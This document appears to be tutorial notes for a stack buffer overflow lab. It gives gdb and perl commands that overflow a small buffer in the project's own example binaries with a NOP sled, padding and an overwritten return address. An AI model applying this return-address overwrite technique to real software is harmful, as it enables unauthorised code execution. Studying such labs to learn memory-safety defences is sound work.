# Buffer Overflow

When running example.out we can overflow the buffer
by providing more than 5 characters. Open up the binary by typing `make run_example`; When inside of gdb you can issue the following commands

````gdb
break main
r `python -c 'print("a"*6)'`;
break exit
print $rbp
````

It should give you output similar to 

````gdb
(void *) 0x..........61
````

Notice how the the a is now present in rbp. If we increase the amount of a's this should become apparent in the rbp register as well.

## Notes

The above commands make use of python to generate shellcode, perl is probably a better choice because in the above example
python2/python3 can be called and in the latter case will cause errors.

````sh
perl -e 'print "\x90"x4'
````

Thus we will instead use the following commands in gdb.

````sh
# run in gdb, provide nop sled as argument.
r `perl -e 'print "\x90"x100'`

# run in gdb, provide (nop sled, shellcode, padding) as argument.
# Not this, nor the above overflows the buffer yet.
r `perl -e 'print "\x90"x100 . "\x90\x90\x90\xeb\xfb" . "\x90"x151'`
````

We pick a region of memory which is inside our nop sled. In my case this is 0x7fffffffdcb8
Remember to write it out backwards because the system is little endian.

````sh
r `perl -e 'print "\x90"x100 . "\x90\x90\x90\xeb\xfb" . "\x90"x159 . "\xb8\xdc\xff\xff\xff\x7f"'`
````

A working overflow which is not too complicated nor too simple can be seen by running the following commands
Note that this would probably require minimal tuning of the return address for example.

````sh
gdb ./build/shellcode_example.out
run `perl ./src/tools/shell.pl`
````

Another important note is that each variable that you use in the scope of a function will offset the stack
with the size of that variable.